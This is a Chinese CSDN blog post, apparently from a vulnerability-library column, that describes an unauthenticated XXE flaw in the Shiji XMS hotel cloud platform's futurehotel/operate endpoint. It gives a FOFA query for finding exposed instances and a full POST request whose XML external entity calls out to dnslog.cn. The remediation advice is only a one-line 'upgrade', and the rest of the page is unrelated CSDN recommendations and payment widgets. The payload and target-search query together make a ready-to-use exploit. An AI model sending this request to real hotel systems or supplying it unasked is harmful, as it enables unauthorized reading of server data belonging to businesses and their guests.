西软云XMS-futurehotel/operate-XXE漏洞

最新推荐文章于 2024-03-08 13:00:00 发布
最新推荐文章于 2024-03-08 13:00:00 发布
阅读量196 收藏 1
点赞数 1
分类专栏: 漏洞文库 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cobra_cobra/article/details/136406452
版权

漏洞描述:

西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。

影响版本:

网站图片:

网络测绘:

fofa语法:

FOFA:app="shiji-西软云XMS"

360quake语法:

Hunter 语法:

漏洞复现:

payload:

POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip
 
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://dnslog.cn"> %remote;]>

效果图:

修复建议:

升级至最新版本。

熊猫安全
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
西软云XMS futurehotel/operate XXE漏洞复现
0xSec
02-29 644
西软云XMS/XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
西软云XMS futurehotel/query XXE漏洞复现
0xSec
02-29 523
西软云XMS/XopServerRS/rest/futurehotel/query接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
5组-SRS文档1
08-08
2. 单字分析评价:落笔云烟可将用户单独上传或依据其他功能所得字体进行具体的打分,该功能可进一步识别出影响字体美观的因素,如结构、笔画等,并将对应的修改意见反馈
魔方PPT模板01-极致简约时尚学术答辩模板.pptx
08-17
魔方PPT模板01-极致简约时尚学术答辩模板.pptx
XMS3.3.0云餐饮操作说明书.pdf
05-27
西软餐饮操作手册
Git-2.16.2-64-bit.exe下载
03-14
2018年-03-14上传 大小:37MB 64-bit Git for Windows Setup
西软云XMS-futurehotel-query接口存在XXE漏洞
qq_36334672的博客
03-08 201
西软云XMS-futurehotel-query接口存在XXE漏洞
云烟-12型4层与常规3层密集烤房的性能对比 (2014年)
05-16
对云南省昆明、玉溪、曲靖、红河、楚雄、大理、昭通、保山、文山、丽江、普洱和临沧12个主产烟区的云烟-12型4层密集烤房与常规3层密集烤房的烤烟效果进行了对比研究。结果表明:云烟-12型4层密集烤房烤能为1.20~1.67...
漏洞复现】西软云XMS反序列化漏洞
weixin_45530380的博客
01-03 861
【代码】【漏洞复现】西软云XMS反序列化漏洞
XXE(xml外部实体注入漏洞)
qq_43294348的博客
01-15 966
BUU XXE COURSE 1 1漏洞破解
XML外部实体注入漏洞
qq_46001025的博客
10-18 87
比如一个场景回显结果都放在一个标签里,不直接输出,先xml解析,但是文本中的 < 和 & 等字符会干扰正常的xml parser 然后报错,这是就需要用到CDATA。通常xxe漏洞存在XML文档的开头,有的waf会检测文件开头,但是XML格式在设置标签属性的格式时允许使用任意数量的空格,因此我们可以在<?例题:https://github.com/CTFTraining/csawqal_2019_web_unagi。参考链接:http://github.com/leezp/xxe-study。
西软云XMS-futurehotel-operate 接口存在XXE漏洞
qq_36334672的博客
03-08 222
西软云XMS-futurehotel-query接口存在XXE漏洞
XML 外部实体 (XXE) 漏洞及其修复方法
allway2的博客
07-27 5755
PHP拥有可能是最流行的后端Web应用程序语言的称号,因此,它是攻击者的主要目标,包括XXE攻击。由于攻击者经常发现新的漏洞,因此必须保持您的PHP版本是最新的以保护您的应用程序。它们不能用于获取二进制文件,或包含类似于XML但实际上不是有效XML的代码的文件。XXEXML外部实体注入)是一种常见的基于Web的安全漏洞,它使攻击者能够干扰Web应用程序中XML数据的处理。虽然是一个常见的漏洞,但通过良好的编码实践和一些特定于语言的建议,可以轻松实现防止XXE攻击。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8261
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
用AIDA模型,分析知乎、小红书和Facebook的广告效果.docx
06-02
用AIDA模型,分析知乎、小红书和Facebook的广告效果.docx
pd27.py1111111111111
最新发布
06-02
pd27.py1111111111111
234_基于微信小程序的车位预约系统的设计与实施-源码.zip
06-02
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯.txt
06-02
蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯蓝桥杯
西软云xms 反序列化
01-22
西软云XMS是一个云基础设施管理系统,其反序列化是指将已经串行化(序列化)的对象数据,重新转换为内存中的对象的过程。在西软云XMS中,反序列化是一个重要的功能,可以用于数据传输、持久化存储、跨系统通信等场景。 在西软云XMS中,反序列化的过程可以通过以下步骤实现: 首先,需要将已经序列化的数据进行传输或者存储。在传输时,可以通过网络传输协议(如HTTP、TCP/IP等)将数据传输给目标对象。在存储时,可以将数据写入到文件系统、数据库等持久化存储介质中。 接下来,接收方需要将接收到的序列化数据进行反序列化处理。在西软云XMS中,可以通过提供的反序列化接口或者方法来完成这一过程。反序列化接口会将接收到的数据进行解码,并根据序列化过程中的规则和约定,将数据重新转换为原始的对象数据。 最后,反序列化的结果将被存储在内存中的对象中,可以根据需要对这些对象进行进一步的操作和处理。在西软云XMS中,反序列化后的对象可以用于系统内部的数据处理、业务逻辑的执行、状态的恢复等方面。 总的来说,西软云XMS中的反序列化是一个将已序列化数据转换为内存中对象的过程,通过网络传输或者存储介质的数据读取,再通过反序列化接口将数据解码并转换为对象。这个过程在云基础设施管理系统中起到了重要的作用,用于实现数据的跨系统通信和持久化存储等功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值